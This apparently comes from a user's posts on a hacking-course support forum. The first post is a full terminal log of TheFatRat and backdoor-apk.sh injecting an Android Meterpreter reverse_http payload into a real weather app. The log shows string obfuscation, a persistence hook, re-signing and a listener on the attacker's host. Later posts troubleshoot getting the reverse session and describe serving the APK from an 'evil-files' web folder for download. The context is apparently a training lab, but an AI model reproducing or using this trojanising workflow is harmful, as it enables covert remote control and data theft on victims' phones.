Forum Replies Created
- AuthorPosts
- buystuff1234Participant
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.100.238 netmask 255.255.255.0 broadcast 192.168.100.255
inet6 fe80::20c:29ff:fe7e:b94e prefixlen 64 scopeid 0x20<link>
ether 00:0c:29:7e:b9:4e txqueuelen 1000 (Ethernet)
RX packets 4825 bytes 2941520 (2.8 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 5780 bytes 891394 (870.5 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 1004 bytes 106816 (104.3 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 1004 bytes 106816 (104.3 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
tun0: flags=4305<UP,POINTOPOINT,RUNNING,NOARP,MULTICAST> mtu 1500
inet 10.8.0.2 netmask 255.255.0.0 destination 10.8.0.2
inet6 fdda:d0d0:cafe:1194::1000 prefixlen 64 scopeid 0x0<global>
inet6 fe80::44b1:5bb1:12d2:e76e prefixlen 64 scopeid 0x20<link>
unspec 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00 txqueuelen 500 (UNSPEC)
RX packets 3229 bytes 1507100 (1.4 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 4378 bytes 445050 (434.6 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
wlan0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 2312
inet 192.168.100.106 netmask 255.255.255.0 broadcast 192.168.100.255
inet6 fe80::7bae:4f96:fdb:22b9 prefixlen 64 scopeid 0x20<link>
ether 00:13:ef:f4:00:60 txqueuelen 1000 (Ethernet)
RX packets 292 bytes 173648 (169.5 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 18 bytes 2738 (2.6 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
root@kali:~# route -n
Kernel IP routing table
Destination Gateway Genmask Flags Metric Ref Use Iface
0.0.0.0 10.8.0.1 128.0.0.0 UG 0 0 0 tun0
0.0.0.0 192.168.100.1 0.0.0.0 UG 100 0 0 eth0
0.0.0.0 192.168.100.1 0.0.0.0 UG 600 0 0 wlan0
10.8.0.0 0.0.0.0 255.255.0.0 U 0 0 0 tun0
128.0.0.0 10.8.0.1 128.0.0.0 UG 0 0 0 tun0
185.213.154.134 192.168.100.1 255.255.255.255 UGH 0 0 0 eth0
192.168.100.0 0.0.0.0 255.255.255.0 U 100 0 0 eth0
192.168.100.0 0.0.0.0 255.255.255.0 U 600 0 0 wlan0
root@kali:~#
IP device: 192.168.100.129
[ ]===========================================================================[ ]
[ ] [ ]
[ ] ) ( ) ) ( ( ) [ ]
[ ] ( ( ( ( /( )\ ) ( /( ( /( )\ ) )\ ) ( /( ( [ ]
[ ] )\ )\ )\ )\())(()/( )\()) )\()) (()/((()/( )\()) )\ ) [ ]
[ ] ((_)((((_)( (((_) |((_)\ /(_)) ((_)\ ((_)\ /(_))/(_))((_)\ (()/( [ ]
[ ] (_) )\_ )\ )\___ |_ ((_)(_))_ ((_) ((_) (_)) (_)) _((_) /(_))_ [ ]
[ ] | _ ) (_)_\(_)((/ __|| |/ / | \ / _ \ / _ \ | _ \|_ _| | \| |(_)) __|[ ]
[ ] | _ \ / _ \ | (__ ‘ < | |) || (_) || (_) || / | | | .` | | (_ |[ ]
[ ] |___/ /_/ \_\ \___| _|\_\ |___/ \___/ \___/ |_|_\|___| |_|\_| \___|[ ]
[ ]===========================================================================[ ]
[ ] Embed a Metasploit Payload in an original .apk files [ ]
[ ] This script is POC for injecting metasploit payload arbitary apk backdoor [ ]
[ ]===========================================================================[ ]
Cleaning Temp files
Done!
Your local IPV4 address is : 192.168.100.106
Your local IPV6 address is : fe80::7bae:4f96:fdb:22b9
Your public IP address is :
Your Hostname is :
Set LHOST IP: 192.168.100.106
Set LPORT: 8080
Enter the path to your android app/game .(ex: /root/downloads/myapp.apk)
Path : /root/Downloads/buienradar.apk
Testing your apk before next step …
+——————————————-+
| [ 1 ] android/meterpreter/reverse_http |
| [ 2 ] android/meterpreter/reverse_https |
| [ 3 ] android/meterpreter/reverse_tcp |
| [ 4 ] android/shell/reverse_http |
| [ 5 ] android/shell/reverse_https |
| [ 6 ] android/shell/reverse_tcp |
+——————————————-+
Choose Payload : 1
[ +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ]
+————————————-+
| [ 1 ] Use Backdoor-apk 0.2.4a |
| [ 2 ] Use old Fatrat method |
| [ 3 ] Use MsfVenom Embedded method |
+————————————-+
Select Tool to create apk : 1
[ +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ]$
Generate Backdoor
+————++————————-++———————–+
| Name || Descript || Your Input
+————++————————-++———————–+
| LHOST || The Listen Addres || 192.168.100.106
| LPORT || The Listen Ports || 8080
| OUTPUTNAME || The Filename output || app_backdoor.apk
| PAYLOAD || Payload To Be Used || android/meterpreter/reverse_http
+————++————————-++———————–+
________
/ ______ \
|| _ _ ||
||| || ||| AAAAAA PPPPPPP KKK KKK
|||_||_||| AAA AAA PPP PPP KKK KKK
|| _ _o|| (o) AAA AAA PPP PPP KKKKKK
||| || ||| AAAAAAAA PPPPPPPP KKK KKK
|||_||_||| AAA AAA PPP KKK KKK
||______|| AAA AAA PPP KKK KKK
/__________\
________|__________|__________________________________________
/____________\
|____________| Dana James Traversie
[*] Running backdoor-apk.sh v0.2.4a on Thu Jul 6 07:29:27 AM EDT 2023
[+] Android manifest permission options:
1) Keep original
2) Merge with payload and shuffle
[?] Please select an Android manifest permission option: 2
[*] Decompiling original APK file…done.
[*] Locating smali file to hook in original project…done.
[+] Package where RAT smali files will be injected: com/supportware/Buienradar
[+] Smali file to hook RAT payload: nl/rtl/buienradar/BuienradarApplication.smali
[*] Generating RAT APK file…done.
[*] Decompiling RAT APK file…done.
[*] Merging permissions of original and payload projects…done.
[*] Injecting helpful Java classes in RAT APK file…done.
[*] Creating new directory in original package for RAT smali files…done.
[+] Inject package path: com/supportware/Buienradar/anvzv
[+] Generated new smali class name for MainBroadcastReceiver.smali: Xoodj
[+] Generated new smali class name for MainService.smali: Omede
[+] Generated new smali class name for Payload.smali: Xiqlw
[+] Generated new smali class name for StringObfuscator.smali: Mvtrc
[+] Generated new smali method name for StringObfuscator.obfuscate method: ludhu
[+] Generated new smali method name for StringObfuscator.unobfuscate method: wgycs
[*] Copying RAT smali files to new directories in original project…done.
[*] Fixing RAT smali files…done.
[*] Obfuscating const-string values in RAT smali files…
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
done.
[*] Adding hook in original smali file…done.
[*] Adding persistence hook in original project…done.
[*] Recompiling original project with backdoor…done.
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Warning:
The certificate uses the SHA1withRSA signature algorithm which is considered a security risk. This algorithm will be disabled in a future update.
The certificate uses a 1024-bit RSA key which is considered a security risk. This key size will be disabled in a future update.
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Warning:
The certificate uses the SHA1withRSA signature algorithm which is considered a security risk. This algorithm will be disabled in a future update.
The certificate uses a 1024-bit RSA key which is considered a security risk. This key size will be disabled in a future update.
[*] Generating RSA key for signing…done.
[*] Signing recompiled APK…done.
[*] Verifying signed artifacts…done.
[*] Aligning recompiled APK…done.
[*] Backdoor apk created succefully
Your RAT apk was successfully builded and signed , it is located here :
~/Fatrat_Generated/app_backdoor.apk
Do you want to create a listener for this configuration to use in msfconsole in future ?
Choose y/n :
msf6 exploit(multi/handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
—- ————— ——– ———–
Payload options (android/meterpreter/reverse_http):
Name Current Setting Required Description
—- ————— ——– ———–
LHOST 192.168.100.106 yes The local listener hostname
LPORT 8080 yes The local listener port
LURI no The HTTP Path
Exploit target:
Id Name
— —-
0 Wildcard Target
msf6 exploit(multi/handler) >
- buystuff1234Participant
Hello Diego,
I did what you said, used the wlan0 IP address to create the apk, but still didn't get a meterpreter session. I also tried lport 4444, but without result.
Any ideas what I could do differently?
Thanks
- buystuff1234Participant
Hello Diego,
Why do I need to use a wireless adapter? The course says nothing about a wireless adapter.
Here the course tells you to create a malicious apk file and then place it in your evil-files on your apache server,
and download it with an android device that is connected to the same network. I have a wireless adapter if needed.
I'm failing to get the meterpreter session.
- buystuff1234Participant
Hey Diego,
Here is the screenshot, but I also tried a different application instead of the flappy bird from the course. When I used angry birds it completed the apk successfully. And I follow all the following steps: moving it to my /var/www/html/evil-files/ and setting up a new listener on metasploit, using exploit/multi/handler/, setting payload /android/meterpreter/reverse_http (tried tcp as well), setting lhost to my IP address and setting lport 8080 (tried 4444 also).
Then exploit to listen for new incoming agents.
Running apache2 and using an android phone to download the application. Which all goes without issues; I download and install the application from the apache server but I don't get the meterpreter session. What am I missing?
- buystuff1234Participant
Hey Diego,
There were a few updates that popped up for VMware. I don't have a firewall installed; I do have NextDNS set up.
Other than that I haven't upgraded or installed anything.
- buystuff1234Participant
Correction: all virtual machines without connection.
- buystuff1234Participant
Hey Diego,
It works, thank you for your patience. I'm new at this, it's obvious 🙂
- buystuff1234Participant
Hey Diego,
I ran the commands but it comes back with an error message.
Let me know what I can do. Thanks
Attachments:
- buystuff1234Participant
Hello Diego,
Sorry, I sent you the wrong screenshot. I installed Empire according to the course with the command apt install powershell-empire.
After a successful installation I ran powershell-empire server, and I get this error message.
Attachments:
- buystuff1234Participant
Hey Diego,
I didn't explain myself well. I followed the course, I ran apt install powershell-empire. Installation gives no errors. Only when running powershell-empire server, it gives the error (screenshot from previous message).
The installation using git clone I wrote is what I tried after that, sorry for not being clear.
Any idea what the issue might be?
- buystuff1234Participant
Hey Diego,
I installed mingw-w64. But the issue was that during the installation of FatRat it gave a notification that the incorrect version of mingw was installed and asked if I wished to install the correct one; I entered yes every time, but it would fail every time. But when I enter no it succeeds.
Thanks as always 🙂
- buystuff1234Participant
And this is the message when it finishes the installation. I'm running this version: Kali 2022 x64 Customized by zSecurity 1.0.12.vmwarevm.7z – 2.9 GB
What could be the issue?
Thanks
Attachments:
- buystuff1234Participant
Hey,
Yeah that was it, the c-tcp payload works fine.
Thanks Diego!
- buystuff1234Participant
Hello,
I used the payload go/meterpreter/rev_http.py
And indeed when I test the backdoor on its own I run into the same issue. It gives a message saying that without a database connected the payload will not work….
I have sent you a screenshot.
Thank you
Attachments:
- buystuff1234Participant
Hello Diego, Yes I downloaded the Kali image from the link here on zSecurity. I haven't run upgrade. I completely installed a new operating system, Ubuntu, and new VMware and Kali but had the same issue. I found a solution from the VMware website: to put it in bridged mode and go to terminal and press enter, and indeed directly you get a wired connection and everything runs. Only NAT mode does not… I do not use a firewall but I do use a private DNS server, NextDNS. But also when I disable NextDNS the issue remains.. Is it possible that the installation of NextDNS messes something up to be able to use NAT mode… otherwise I'm running out of ideas.
Let me know if you have any suggestions. Thank you